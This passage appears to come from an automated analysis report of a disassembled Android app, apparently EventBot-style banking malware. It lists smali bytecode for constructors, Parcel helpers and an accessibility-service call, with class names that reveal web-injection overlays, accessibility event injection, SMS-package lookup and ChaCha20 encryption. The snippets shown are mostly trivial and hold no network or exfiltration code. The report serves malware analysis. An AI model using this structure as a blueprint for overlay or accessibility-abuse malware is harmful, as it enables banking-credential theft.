                        3iput-object p3, p0, Lcom/lib$5;->val$bcr:Landroid/content/BroadcastReceiver;
                        4iput-object p4, p0, Lcom/lib$5;->val$intent:Landroid/content/Intent;
                        6invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        7return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$6;->this$0:Lcom/lib;
                        2iput-object p2, p0, Lcom/lib$6;->val$context:Landroid/content/Context;
                        3iput-object p3, p0, Lcom/lib$6;->val$bcr:Landroid/content/BroadcastReceiver;
                        4iput-object p4, p0, Lcom/lib$6;->val$intent:Landroid/content/Intent;
                        6invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        7return-void
                        Cross References
                        APIs
                        • java.lang.Thread.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$8;->this$0:Lcom/lib;
                        2iput-object p2, p0, Lcom/lib$8;->val$context:Landroid/content/Context;
                        3iput-object p3, p0, Lcom/lib$8;->val$reason:Ljava/lang/String;
                        4iput-object p4, p0, Lcom/lib$8;->val$log:Ljava/lang/String;
                        6invoke-direct {p0}, Ljava/lang/Thread;-><init>()V
                        7return-void
                        Cross References
                        APIs
                        • android.webkit.WebViewClient.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$webInjViewClient;->this$0:Lcom/lib;
                        3invoke-direct {p0}, Landroid/webkit/WebViewClient;-><init>()V
                        4iput-object p2, p0, Lcom/lib$webInjViewClient;->context:Landroid/content/Context;
                        5iput-object p3, p0, Lcom/lib$webInjViewClient;->stopWord:Ljava/lang/String;
                        6iput-object p4, p0, Lcom/lib$webInjViewClient;->webViewActivity:Landroid/app/Activity;
                        7return-void
                        Cross References
                        APIs
                        • android.webkit.WebViewClient.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$webInjViewClientOld;->this$0:Lcom/lib;
                        3invoke-direct {p0}, Landroid/webkit/WebViewClient;-><init>()V
                        4iput-object p2, p0, Lcom/lib$webInjViewClientOld;->context:Landroid/content/Context;
                        5iput-object p3, p0, Lcom/lib$webInjViewClientOld;->stopWord:Ljava/lang/String;
                        6iput-object p4, p0, Lcom/lib$webInjViewClientOld;->webOverlay:Landroid/webkit/WebView;
                        7return-void
                        Cross References
                        APIs
                        • android.accessibilityservice.AccessibilityService.performGlobalAction
                        Position Instruction Meta Information
                        0.prologue
                        2sget-object v0, Lcom/lib;->a11yService:Landroid/accessibilityservice/AccessibilityService;
                        3const/4 v1, 0x2
                        5invoke-virtual {v0, v1}, Landroid/accessibilityservice/AccessibilityService;->performGlobalAction(I)Z
                        6const/4 v0, 0x1
                        7return v0
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$7;->this$0:Lcom/lib;
                        2iput-object p2, p0, Lcom/lib$7;->val$context:Landroid/content/Context;
                        3iput-object p3, p0, Lcom/lib$7;->val$intent:Landroid/content/Intent;
                        5invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        6return-void
                        APIs
                        • android.support.v7.app.AppCompatActivity.isFinishing
                        • com.example.eventbot.service.Func:Lcom/libInterface
                        Position Instruction Meta Information
                        1invoke-super {p0}, Landroid/support/v7/app/AppCompatActivity;->isFinishing()Z
                        2move-result v0
                        3try_start_4:
                        4sget-object v1, Lcom/example/eventbot/service;->Func:Lcom/libInterface;
                        5catchall_6: return v0
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$3;->this$0:Lcom/lib;
                        2iput-object p2, p0, Lcom/lib$3;->val$context:Landroid/content/Context;
                        4invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        5return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$injectEvent;->this$0:Lcom/lib;
                        3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        4iput-object p2, p0, Lcom/lib$injectEvent;->event:Landroid/view/accessibility/AccessibilityEvent;
                        5return-void
                        APIs
                        • java.lang.Thread.start
                        Position Instruction Meta Information
                        0.prologue
                        2iget-object v0, p0, Lcom/lib;->a11yInjectThread:Ljava/lang/Thread;
                        4invoke-virtual {v0}, Ljava/lang/Thread;->start()V
                        5return-void
                        APIs
                        • android.os.Parcel.readDouble
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0}, Landroid/os/Parcel;->readDouble()D
                        4move-result-wide v0
                        5return-wide v0
                        APIs
                        • android.os.Parcel.readFloat
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0}, Landroid/os/Parcel;->readFloat()F
                        4move-result v0
                        5return v0
                        APIs
                        • android.os.Parcel.readInt
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0}, Landroid/os/Parcel;->readInt()I
                        4move-result v0
                        5return v0
                        APIs
                        • android.os.Parcel.readLong
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0}, Landroid/os/Parcel;->readLong()J
                        4move-result-wide v0
                        5return-wide v0
                        APIs
                        • android.os.Parcel.readString
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0}, Landroid/os/Parcel;->readString()Ljava/lang/String;
                        4move-result-object v0
                        5return-object v0
                        APIs
                        • android.os.Parcel.readStrongBinder
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0}, Landroid/os/Parcel;->readStrongBinder()Landroid/os/IBinder;
                        4move-result-object v0
                        5return-object v0
                        APIs
                        • android.os.Parcel.writeParcelable
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        2const/4 v1, 0x0
                        4invoke-virtual {v0, p1, v1}, Landroid/os/Parcel;->writeParcelable(Landroid/os/Parcelable;I)V
                        5return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0iput-object p1, p0, Lcom/example/eventbot/alarm$1;->this$0:Lcom/example/eventbot/alarm;
                        1iput-object p2, p0, Lcom/example/eventbot/alarm$1;->val$context:Landroid/content/Context;
                        3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        4return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0iput-object p1, p0, Lcom/example/eventbot/boot$1;->this$0:Lcom/example/eventbot/boot;
                        1iput-object p2, p0, Lcom/example/eventbot/boot$1;->val$context:Landroid/content/Context;
                        3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        4return-void
                        Cross References
                        APIs
                        • com.example.eventbot.service.handler:Landroid/os/Handler
                        • android.os.Handler.post
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lcom/example/eventbot/service;->handler:Landroid/os/Handler;
                        3invoke-virtual {v0, p1}, Landroid/os/Handler;->post(Ljava/lang/Runnable;)Z
                        4return-void
                        Cross References
                        APIs
                        • java.lang.Exception.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$ChaCha20$WrongKeySizeException;->this$1:Lcom/lib$ChaCha20;
                        3invoke-direct {p0}, Ljava/lang/Exception;-><init>()V
                        4return-void
                        Cross References
                        APIs
                        • java.lang.Exception.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$ChaCha20$WrongNonceSizeException;->this$1:Lcom/lib$ChaCha20;
                        3invoke-direct {p0}, Ljava/lang/Exception;-><init>()V
                        4return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$Curve25519$long10;->this$1:Lcom/lib$Curve25519;
                        3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        4return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        1iput-object p1, p0, Lcom/lib$screenLockType;->this$0:Lcom/lib;
                        3invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        4return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        3iput-object p1, p0, Lcom/libInterface$injectEvent;->event:Landroid/view/accessibility/AccessibilityEvent;
                        4return-void
                        Cross References
                        APIs
                        • android.provider.Telephony$Sms.getDefaultSmsPackage
                        Position Instruction Meta Information
                        0.prologue
                        2invoke-static {p1}, Landroid/provider/Telephony$Sms;->getDefaultSmsPackage(Landroid/content/Context;)Ljava/lang/String;
                        3move-result-object v0
                        4return-object v0
                        APIs
                        • android.os.Parcel.writeInt
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1}, Landroid/os/Parcel;->writeInt(I)V
                        4return-void
                        APIs
                        • android.os.Parcel.writeBundle
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1}, Landroid/os/Parcel;->writeBundle(Landroid/os/Bundle;)V
                        4return-void
                        APIs
                        • android.os.Parcel.writeDouble
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1, p2}, Landroid/os/Parcel;->writeDouble(D)V
                        4return-void
                        APIs
                        • android.os.Parcel.writeFloat
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1}, Landroid/os/Parcel;->writeFloat(F)V
                        4return-void
                        Cross References
                        APIs
                        • android.os.Parcel.writeInt
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1}, Landroid/os/Parcel;->writeInt(I)V
                        4return-void
                        APIs
                        • android.os.Parcel.writeLong
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1, p2}, Landroid/os/Parcel;->writeLong(J)V
                        4return-void
                        APIs
                        • android.os.Parcel.writeString
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1}, Landroid/os/Parcel;->writeString(Ljava/lang/String;)V
                        4return-void
                        APIs
                        • android.os.Parcel.writeStrongBinder
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1}, Landroid/os/Parcel;->writeStrongBinder(Landroid/os/IBinder;)V
                        4return-void
                        APIs
                        • android.os.Parcel.writeStrongInterface
                        Position Instruction Meta Information
                        1iget-object v0, p0, Landroidx/versionedparcelable/VersionedParcelParcel;->mParcel:Landroid/os/Parcel;
                        3invoke-virtual {v0, p1}, Landroid/os/Parcel;->writeStrongInterface(Landroid/os/IInterface;)V
                        4return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0iput-object p1, p0, Lcom/example/eventbot/MainActivity$Curve25519$long10;->this$1:Lcom/example/eventbot/MainActivity$Curve25519;
                        2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        3return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0iput-object p1, p0, Lcom/example/eventbot/service$1;->this$0:Lcom/example/eventbot/service;
                        2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        3return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0iput-object p1, p0, Lcom/example/eventbot/service$2;->this$0:Lcom/example/eventbot/service;
                        2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        3return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        0iput-object p1, p0, Lcom/example/eventbot/service$3;->this$0:Lcom/example/eventbot/service;
                        2invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        3return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2iput-object p1, p0, Landroidx/versionedparcelable/ParcelImpl;->mParcel:Landroidx/versionedparcelable/VersionedParcelable;
                        3return-void
                        Cross References
                        APIs
                        • java.io.ObjectInputStream.<init>
                        Position Instruction Meta Information
                        0iput-object p1, p0, Landroidx/versionedparcelable/VersionedParcel$1;->this$0:Landroidx/versionedparcelable/VersionedParcel;
                        2invoke-direct {p0, p2}, Ljava/io/ObjectInputStream;-><init>(Ljava/io/InputStream;)V
                        3return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • android.content.BroadcastReceiver.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/content/BroadcastReceiver;-><init>()V
                        2return-void
                        APIs
                        • android.content.BroadcastReceiver.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/content/BroadcastReceiver;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        Cross References
                        APIs
                        • android.accessibilityservice.AccessibilityService.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/accessibilityservice/AccessibilityService;-><init>()V
                        2return-void
                        APIs
                        • android.content.BroadcastReceiver.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/content/BroadcastReceiver;-><init>()V
                        2return-void
                        APIs
                        • android.content.BroadcastReceiver.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/content/BroadcastReceiver;-><init>()V
                        2return-void
                        APIs
                        • android.content.BroadcastReceiver.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/content/BroadcastReceiver;-><init>()V
                        2return-void
                        APIs
                        • android.app.Activity.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/app/Activity;-><init>()V
                        2return-void
                        Cross References
                        APIs
                        • android.app.Service.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/app/Service;-><init>()V
                        2return-void
                        APIs
                        • android.app.Service.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Landroid/app/Service;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void
                        Cross References
                        APIs
                        • java.lang.Object.<init>
                        Position Instruction Meta Information
                        1invoke-direct {p0}, Ljava/lang/Object;-><init>()V
                        2return-void